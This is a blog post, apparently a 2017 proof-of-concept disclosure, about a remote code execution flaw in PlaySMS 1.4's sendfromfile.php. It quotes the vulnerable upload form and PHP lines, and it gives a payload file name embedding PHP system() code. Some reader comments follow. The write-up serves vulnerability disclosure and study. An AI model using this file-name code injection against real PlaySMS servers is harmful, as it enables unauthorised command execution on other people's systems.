PlaySMS 1.4 Code Execution in sendfromfile.php

Post author:touhid
Post published:May 17, 2017
Post category:PoC
Post comments:2 Comments

PlaySMS 1.4 allows remote code execution because PHP code in the name of an uploaded .php file is executed. sendfromfile.php has a combination of Unrestricted File Upload and Code Injection.

Unrestricted File Upload:

Any registered user can upload any file because of not proper Validation of file in sendfromfile.

Code Execution using $filename

Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily. but not store in any folder so our shell is useless. But if User change the file name to “mybackdoor.php” to “<?php system(‘uname -a’); dia();?>.php” .Then server check for file and set some perameter $filename=”<?php system(‘uname -a’); dia();?>.php” . you can see code below and display $filename on page.

Proof of Concept

Go to : http://127.0.0.1/playsms/index.php?app=main&inc=feature_sendfromfile&op=list

`This is Form.`

----------------------------Form for upload CSV file ---------------------- <form action=\"index.php?app=main&inc=feature_sendfromfile&op=upload_confirm\" enctype=\"multipart/form-data\" method=\"post\"> " . _CSRF_FORM_ . " <p>" . _('Please select CSV file') . "</p> <p><input type=\"file\" name=\"fncsv\"></p> <p class=help-block>" . _('CSV file format') . " : " . $info_format . "</p> <p><input type=checkbox name=fncsv_dup value=1 checked> " . _('Prevent duplicates') . "</p> <p><input type=\"submit\" value=\"" . _('Upload file') . "\" class=\"button\"></p> </form> ------------------------------Form ends ---------------------------

-------------PHP code for set parameter ---------------------------       case 'upload_confirm':         $filename = $_FILES['fncsv']['name'];   ------------------------------php code ends ---------------------------

$filename will be visible on page:

----------------------Vulnerable perameter show ----------------------   line 123 : $content .= _('Uploaded file') . ': ' . $filename . '<p />';   ----------------------------------------------------------------------

For Video Demo.

This Post Has 2 Comments

0x3a May 23, 2017 Reply

Good Job Man
wallybroky January 21, 2021 Reply

i am so satisfacted.my english is poor, sorry :). thx for approving my user greetings wally

Comments

Miro on Metasploitable3 Installing and Building (Step by Step)November 5, 2023
Hej bro, can you provide a link to get the OVA file, I run all the time into errors. I…
Matteo on Metasploitable3 Installing and Building (Step by Step)November 4, 2023
Hello, i would to tell the link for the .ova file is broken. Maybe you can update it.
Aki on Metasploitable3 Installing and Building (Step by Step)June 11, 2023
Hi, the link to Metaspoitable 3 isn't available ( OVA) could upload another link?
Keep your online assets safe with a solid understanding of DNS Records! As the b... - Bug Bounty Tips on Subdomain Takeover Explained with PracticalFebruary 13, 2023
[…] #DNSTechnologies is essential for #CyberSecurity professionals. For more on Subdomain Takeover touhidshaikh.com/blog/2019/01/s… #infosec #dnssecurity #bugbountytips Source by […]
Deidre on Pluck Walkthrough (VulnHub)May 14, 2021
Great post.

Unrestricted File Upload:

Proof of Concept

This is Form.

This Post Has 2 Comments

Leave a Reply Cancel reply

`This is Form.`